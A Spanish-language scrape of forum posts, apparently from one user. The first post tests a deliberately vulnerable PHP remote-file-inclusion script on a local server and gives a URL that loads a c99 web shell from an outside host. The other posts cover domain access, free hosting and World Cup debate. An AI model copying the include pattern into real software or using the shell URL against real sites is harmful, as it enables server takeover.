Mensajes

Buenas, tome un ejemplo de un codigo vulnerable de la wiki de elhacker.net.

Este codigo que voy a poner a continuacion, lo tengo en un wamp, es decir me instale un servidor local para hacer la prueba.

El index.html seria el siguiente:

Código [Seleccionar] Expandir

<HTML>
<HEAD>
<TITLE> Prueva de RFI </TITLE>
</HEAD>
<BODY>

<A HREF="rfi.php?cont=hola.html">Hola!</A>
<BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

</BODY>
</HTML>

El rfi.php seria el siguiente:

Código [Seleccionar] Expandir


<?php
 
$var = $_GET["cont"];
include($var);
 
?>


Ahora bien, me cree una cuenta en un servidor gratuito, para ser mas especifico en este : 000webhost.com

Y subi una shell(c99) con extension en txt.

Ahora bien, verifique efectivamente que la web esta sea vulnerable de al siguiente manera : http://localhost/rfi.php?cont=http://google.com , efectivamente abre google.

Ahora, si pruebo hacer lo siguiente :

http://localhost/rfi.php?cont=http://mipagina/shell.txt

Me dan los siguientes errores y no entiendo el motivo.


Warning: include(http://mipagina.com/shell.txt) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\rfi.php on line 4

Warning: include() [function.include]: Failed opening 'http://mipagina.com/shell.txt'; for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\rfi.php on line 4

Alguien entiendo cual es el problema? o si estoy haciendo algo mal?

Saludos y gracias.

Debe ser algo obvio lo que voy a preguntar pero por mas que busque no logre encontrar la respuesta.

La cuestion es que me cruze con una pagina a la cual se puede entrar solamente poniendo http://pagina.com , pero sin embargo si pones www.pagina.com no entra.

No entiendo el motivo de esto..

Incluso si pongo http://www.pagina.com tampoco entra.

Alguien me lo puede explicar?

Gracias.

Te parece que no hay foros de ayuda?

Esta dudas generales, en el que puedes plantear cualquier duda (seria lo mas parecido a un foro 'ayuda').

Hola vengo a preguntar si es posible crear una web como yo quiera sin pagar un servidor y que no sea servidor gratuito

Sino es gratis ni de pago? como seria?

Se me ocurre solo que instales un servidor en la pc de tu casa, por ejemplo el WAMP.

Puedes alojar tu web en un servidor gratuito y tener un foro como este, siempre y cuando te den 1 base mysql, dsps evidentemente vas a tener todas las limitaciones propias de un servidor gratuito.. para tener un foro como este busca informacion sobre SMF.

Saludos..

Con todo respeto Holanda nunca gano una copa y elimino a brasil .. españa nunca gano nada y elimino a paraguay..

Asi que SI aumenta la probabilidad.. por supuesto que lo hace!

Y no somos ningunos soberbios.. todo lo contrario.. siempre son uds los que se sienten superiores.. o el termino "sudaca" de donde nace?
Tene un poco de critica vos tmb...

Quien dice que españa gano con trampa? no gano con trampa.. y villa es un jugadorazo.. pero no estamos hablando de eso..

Simplemente digo que america del sur gano mas que todo el resto del mundo junto.. y esto es una realidad..

Claro que por algo es, porque somos menos poblacion y menos cantidad de paises.

Y asi igual los superamos.. este mundial puede que lo gane un europeo.. pero eso no va a cambiar la realidad..


P.D : Uruguay ya jugo y ya gano.. no se que dices que espere a hoy..

Sudamérica ha ganado los mismos mundiales que Europa y probablemente este año gane uno de Europa.

Claro si tenemos en cuenta la poblacion de europa y la cantidad de plazas que le dan..

Europa lleva 13 equipos al mundial, y america lleva 4,5 osea debe jugar un repechaje para poder llevar al 5.

Llevan mas del doble de equipos..

Yo no digo que españa no lo puede ganar, tal vez si.

En todo caso los ingleses.. y sus ligas estan todas copadas con jugadores de aca..
El futbol se late en sudamerica.. duela a quien le duela..


Sudamerica representa el 5% de la poblacion mundial.. y tiene mas gloria que todo el resto junto..

Se sabe que españa en esto del futbol es novata.. recien empieza... solo gano una eurocopa y nada mas.. de todas formas felicidades..

Con todo respeto, mucha de la gente que aca en el foro festejando esta derrota, vive en paises en los que siempre van a tener que hinchar por otras selecciones.. por que la suya ni clasifica.

Estoy seguro que debe haber mucho mexicano festejando esto, que creo que lo maximo que lograron en toda su historia es llegar a octavos de final..

Hay mucha gente que no tiene en cuenta que argentina es un pais que gano la copa del mundo 2 veces y 14 veces la copa america..

Yo soy uruguayo en realidad mi seleccion sigue en pie.. solo dejo esto porque me parece que hay mucha gente que se confunde...

Saludos..